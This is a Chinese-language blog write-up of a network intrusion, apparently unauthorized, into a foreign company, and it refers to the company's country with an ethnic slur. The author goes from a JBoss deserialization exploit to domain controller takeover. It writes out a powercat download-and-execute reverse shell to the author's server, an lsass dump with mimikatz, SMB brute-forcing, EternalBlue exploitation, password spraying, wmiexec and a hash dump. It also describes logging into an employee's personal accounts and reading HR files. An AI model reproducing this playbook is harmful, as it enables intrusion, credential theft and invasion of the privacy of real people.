從cve到幸運(yùn)域控

前言
這次滲透測試是從一個CVE開始的，從阿三外網(wǎng)的Jboss打點(diǎn)到內(nèi)網(wǎng)然后到域控,手法很簡單常規(guī),主要還是要擴(kuò)展一下思路吧哈哈哈!

打點(diǎn)
首先對發(fā)現(xiàn)了該站點(diǎn)的JBoss頁面，經(jīng)過測試發(fā)現(xiàn)具有JBoss反序列化漏洞

使用網(wǎng)上提供的EXP和利用方法,獲取了一個shell。

這里看到對方是windows系統(tǒng)，當(dāng)前用戶權(quán)限是管理員權(quán)限。并且該機(jī)器具有兩張網(wǎng)卡，通向了兩個網(wǎng)段,存在域環(huán)境
想直接上線cs多人運(yùn)動,發(fā)現(xiàn)上線失敗,機(jī)器也是出網(wǎng)的,嘗試powershell,hta,exe wmi都不行，真的奇怪，對方機(jī)器并無殺軟。

tasklist /svc

這里就想著先拿一個穩(wěn)定的shell，想往部署war包的路徑寫個冰蝎的馬,
由于這個shell并不穩(wěn)定 這里遠(yuǎn)程加載powercat腳本反彈到vps上

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ip -p 9000 -e cmd

在jboss/server/default/deploy/management/目錄 echo寫入 冰蝎的馬子
windows下注意要使用^對尖括號進(jìn)行轉(zhuǎn)義 本地實(shí)驗(yàn)一下,成功

往目標(biāo)機(jī)器寫入 成功連接,very good

至此打點(diǎn)成功 看了一下好像挺多前輩的痕跡的哈哈哈

本機(jī)信息收集
拿到webshell后先維權(quán)。然后依托當(dāng)前機(jī)器收集盡可能多的信息 迅速了解目標(biāo)的內(nèi)網(wǎng)大致網(wǎng)絡(luò)結(jié)構(gòu)和機(jī)器軟件環(huán)境 為下一步繼續(xù)深入做好準(zhǔn)備

ipconfig /all &&netstat -ano &&arp -a  查看當(dāng)前機(jī)器處于哪個環(huán)境哪個網(wǎng)段
wmic os get caption,csdversion,osarchitecture,version 抓明文之前了解目標(biāo)系統(tǒng)版本 有些默認(rèn)是抓不到明文的
wmic product get name,version 查看安裝軟件列表
whoami /user &&quer user 
tasklist /v && net start 
systeminfo

可以看到當(dāng)前我們獲得的這臺是win7企業(yè)版的主機(jī) 且處在域內(nèi)。有2張網(wǎng)卡 通向2個網(wǎng)段
然后不斷的翻資料，不斷的翻資料
翻到這家企業(yè)的人力資源手冊 wifi密碼 網(wǎng)關(guān) 疑似oracle數(shù)據(jù)賬號密碼等信息

把人力資源手冊翻譯看看 發(fā)現(xiàn)這是一家xx私人有限公司 

包括企業(yè)的政策及用人部分分配處分等信息

通過圖標(biāo)大致英文通過搜索引擎得到他的官網(wǎng) www.sxxxx.com

把資料翻完之后 抓取一下瀏覽器記錄及密碼
使用hack-browser-data
抓取下來本地查看

還是有很多有價(jià)值的密碼的 把這些密碼收集起來 還發(fā)現(xiàn)他用gmail郵箱注冊了一個網(wǎng)站的賬號 哇嗚
然后登錄查看一下這些網(wǎng)站的發(fā)現(xiàn)這臺機(jī)的主人還有玩一些投資的平臺哈哈哈,是位美女喔 具體是什么沒深入下去

有個網(wǎng)站引起了我的注意 登錄發(fā)現(xiàn)這是一個企業(yè)內(nèi)部操作平臺類似OA吧
可以看到大量企業(yè)人員的信息 并且可進(jìn)行通話 這個操作真的太強(qiáng)了

然后嘗試抓密碼
prodump導(dǎo)出

procdump64.exe -accepteula -ma lsass.exe 1.dmp

makecab c:\jboss\bin\1.dmp  1.zip

利用windows自帶的壓縮工具壓縮一下然后下載回來

離線mimikatz讀取

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

我x！直接抓到域管賬號administrator的密碼,oh my god 我直呼好家伙
其實(shí)挺好奇的 看了一下該機(jī)器名 為EDP
接著百度了一下

emmmm 應(yīng)該就是高層人員的意思吧,當(dāng)前獲取的是一名高層女主管機(jī)器
然后整理收集得到的密碼 相對來說還是相對豐富的

域內(nèi)信息收集

net group /domain 查看域組
net group "domain users" /domain 域內(nèi)用戶 
net group "domain admins" /domain 域管用戶
net group "domain computers" /domain 域內(nèi)機(jī)器 
net group "domain controllers" /domain域控機(jī)器
定位域控

這個內(nèi)網(wǎng)還是相當(dāng)多機(jī)器的

可以看到域控的機(jī)器名為ADC1
通過Ipconfig /all 看到dns服務(wù)器為192.168.0.100該機(jī)器
通過ping 域名查看

可以確認(rèn)192.168.0.100為域控

gpp 查看共享組策略目錄中是否存在密碼
搜索存放在GPP目錄中的各類明文的賬號密碼，共享組策略目錄是域中最容易出現(xiàn)密碼的地方，一般管理員會把一些bat腳本放在里面用來重置域內(nèi)客戶機(jī)器本地的administrator的密碼
留意syslog netlogon

net time /domain
net view adc1
dir \\adc1\netlogon
dir \\adc1\syslog

但并無結(jié)果

獲取域內(nèi)spn記錄
摸清域內(nèi)敏感機(jī)器資產(chǎn)的分布。方便之后突破。
可以拿著這些獲取到的機(jī)器名，來快速完整探測當(dāng)前域內(nèi)的所有存活主機(jī)
通過net view還是比較不準(zhǔn)的 開啟防火墻也是探測不到的

setspn -T xxx.com -Q */* >spn.txt

接著對拉回來的spn文件進(jìn)行處理，獲取spn記錄前面的主機(jī)名字

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

通過SPN我們可以獲取到域內(nèi)的存活主機(jī)何一些主機(jī)的具體作用?？梢酝ㄟ^主機(jī)的名字來獲取到這個主機(jī)提供什么服務(wù)。
除了SPN收集域內(nèi)的信息的話，還可以通過bloodHound來獲取域內(nèi)的一些信息。接著快速抓取當(dāng)前域內(nèi)的所有用戶，組，會話，數(shù)據(jù)，上傳exe文件上去然后再把數(shù)據(jù)給回去下來

內(nèi)網(wǎng)存活機(jī)器及資產(chǎn)搜集
利用毒液venom代理

smb探測
掛socks5 msf里的smb_versionb模塊 看當(dāng)前你的網(wǎng)速 越快越準(zhǔn)

setg Proxies socks5:ip:端口
setg reverseallowproxy true
set rhosts file:/home/kali/Desktop/ip.txt
set threads 15

利用收集到的密碼對內(nèi)網(wǎng)機(jī)器進(jìn)行批量smb弱口令探測 連接
整理出來

還是收獲很大的
對其他服務(wù)器進(jìn)行弱口令探測
爆破出一臺linux主機(jī) 一臺windows主機(jī)查找文件 

查看歷史命令等其他信息并無發(fā)現(xiàn)

探測內(nèi)網(wǎng)web資產(chǎn)

內(nèi)網(wǎng)jboss拿下8臺
企業(yè)管理后臺
嘗試弱口令與之前的密碼 無果

mirth connect xx信息接口集成引擎
admin/admin弱口令進(jìn)入

對內(nèi)網(wǎng)的Windows機(jī)器進(jìn)行永恒之藍(lán)滲透
對內(nèi)網(wǎng)的主機(jī)進(jìn)行MS17-010漏洞探， 通過venom把msf代入內(nèi)網(wǎng)進(jìn)行探測，發(fā)現(xiàn)了有很多主機(jī)都存在有永恒之藍(lán)的漏洞

主機(jī)為64位 migrate遷移進(jìn)程

利用Kiwi讀取密碼

打下十幾臺主機(jī) 其中包括幾臺敏感的機(jī)器 想繼續(xù)深度挖掘的 但是太累了哈哈哈！繼續(xù)深度挖掘就抓密碼讀敏感文件 谷歌瀏覽器賬號密碼 一直反復(fù)拿到自己想要拿的資料為止吧！

看到內(nèi)部人員的入職等情況 繼續(xù)利用Kiwi讀取密碼

讀取了4 5臺后發(fā)現(xiàn)密碼幾乎一樣 是站點(diǎn)域名@123 看來還是很多根據(jù)域名xxx@123等來設(shè)置密碼的啊
那么我們可以嘗試?yán)糜蛴脩魜磉M(jìn)行一波密碼噴射看看效果如何

可以看到還是非常多域內(nèi)用戶使用了該密碼
這邊使用wmiexec.py連接域控

python3 ./wmiexec.py sxxxx/Administrator:密碼@192.168.0.100

發(fā)現(xiàn)開啟3389嘗試連接域控
成功連接

利用域管密碼導(dǎo)出域內(nèi)用戶hash

可以看到密碼復(fù)用率非常高??！基本只有幾個用戶密碼是不一樣的

后續(xù)
失敗的溯源
在一個盤符里面看到了個bat文件 打開一看應(yīng)該是前輩留下來的哈哈哈 看看能不能溯源一下

可以看到這個應(yīng)該是cs的https的監(jiān)聽端口
某個地區(qū)的xx云 這臺估計(jì)就是前輩的c2服務(wù)器了吧！
通過威脅平臺查看一下

估計(jì)是dns解析上線cs 盲猜一波 后面3個估計(jì)是cs1 cs2 cs3
這里查不到郵箱等注冊信息 是做了隱私保護(hù)吧！這里如果能查到注冊者或者郵箱的話還可以進(jìn)行下一步 后續(xù)通過搜索引擎對這個ip進(jìn)行信息收集了一段時間后 并無什么成果 哈哈哈 思路暫時斷

總結(jié)
這次滲透測試來說還是挺順利的
就是不斷信息收集進(jìn)行突破,真的是信息收集到一定程度時,已經(jīng)能拿下很多機(jī)器了。